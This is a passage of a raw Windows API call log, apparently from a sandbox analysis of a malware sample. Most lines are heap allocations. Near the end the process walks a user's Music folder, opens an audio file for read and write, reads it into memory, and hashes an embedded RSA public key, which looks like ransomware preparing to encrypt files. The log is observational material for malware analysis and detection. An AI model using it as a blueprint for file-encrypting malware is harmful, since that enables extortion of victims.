lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0198.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0198.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0198.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0198.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.851] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\") returned="BJHxLX\\" [0198.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94ba0 [0198.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.851] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0198.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94ba0 | out: hHeap=0x620000) returned 1 [0198.851] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0198.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0198.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0198.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.852] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0198.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0198.852] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0198.852] PathFindFileNameW (pszPath="") returned="" [0198.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.852] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\*" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5a88c40, ftCreationTime.dwHighDateTime=0x1d89c6d, ftLastAccessTime.dwLowDateTime=0x6b678d10, ftLastAccessTime.dwHighDateTime=0x1d8a100, ftLastWriteTime.dwLowDateTime=0x6b678d10, ftLastWriteTime.dwHighDateTime=0x1d8a100, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0198.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.854] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5a88c40, ftCreationTime.dwHighDateTime=0x1d89c6d, ftLastAccessTime.dwLowDateTime=0x6b678d10, ftLastAccessTime.dwHighDateTime=0x1d8a100, ftLastWriteTime.dwLowDateTime=0x6b678d10, ftLastWriteTime.dwHighDateTime=0x1d8a100, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.854] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb06c760, ftCreationTime.dwHighDateTime=0x1d8a306, ftLastAccessTime.dwLowDateTime=0xf64f3330, ftLastAccessTime.dwHighDateTime=0x1d8a572, ftLastWriteTime.dwLowDateTime=0xf64f3330, ftLastWriteTime.dwHighDateTime=0x1d8a572, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9AsT-P", cAlternateFileName="")) returned 1 [0198.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0198.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0198.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0198.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0198.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0198.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0198.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e917a8 | out: hHeap=0x620000) returned 1 [0198.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0198.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0198.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0198.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0198.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.875] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e68cb00, ftCreationTime.dwHighDateTime=0x1d89ab1, ftLastAccessTime.dwLowDateTime=0x5ae9c5d0, ftLastAccessTime.dwHighDateTime=0x1d89bdc, ftLastWriteTime.dwLowDateTime=0x5ae9c5d0, ftLastWriteTime.dwHighDateTime=0x1d89bdc, nFileSizeHigh=0x0, nFileSizeLow=0x16df0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cmBSppsTLRb9u.m4a", cAlternateFileName="CMBSPP~1.M4A")) returned 1 [0198.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.876] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\cmBSppsTLRb9u.m4a") returned=".m4a" [0198.876] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\cmBSppsTLRb9u.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\cmbsppstlrb9u.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0198.918] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=93680) returned 1 [0198.919] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0198.921] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x16dca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.921] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.923] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x16df0, lpOverlapped=0x0) returned 1 [0198.925] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0198.925] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.925] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.925] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0198.926] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0198.926] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.926] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0198.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0198.926] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0198.926] GetLastError () returned 0x0 [0198.926] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0198.926] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0198.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0198.927] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0198.927] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0198.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.927] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0198.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0198.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0198.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16df0) returned 0x2ea79b0 [0198.928] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0198.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0198.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0198.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdd7e0 [0198.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c92f88 [0198.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddb40 [0198.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93198 [0198.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0198.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0198.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30b0 [0198.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0198.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0198.929] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0198.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0198.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0198.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0198.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0198.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30b0 [0198.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0198.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3068 [0198.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0198.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0198.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0198.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0198.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0198.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0198.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0198.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0198.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0198.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0198.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0198.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0198.932] GetCurrentThreadId () returned 0x66c [0198.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0198.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64ceb0 [0198.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0198.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0198.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0198.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0198.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.933] GetCurrentThreadId () returned 0x66c [0198.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0198.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0198.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 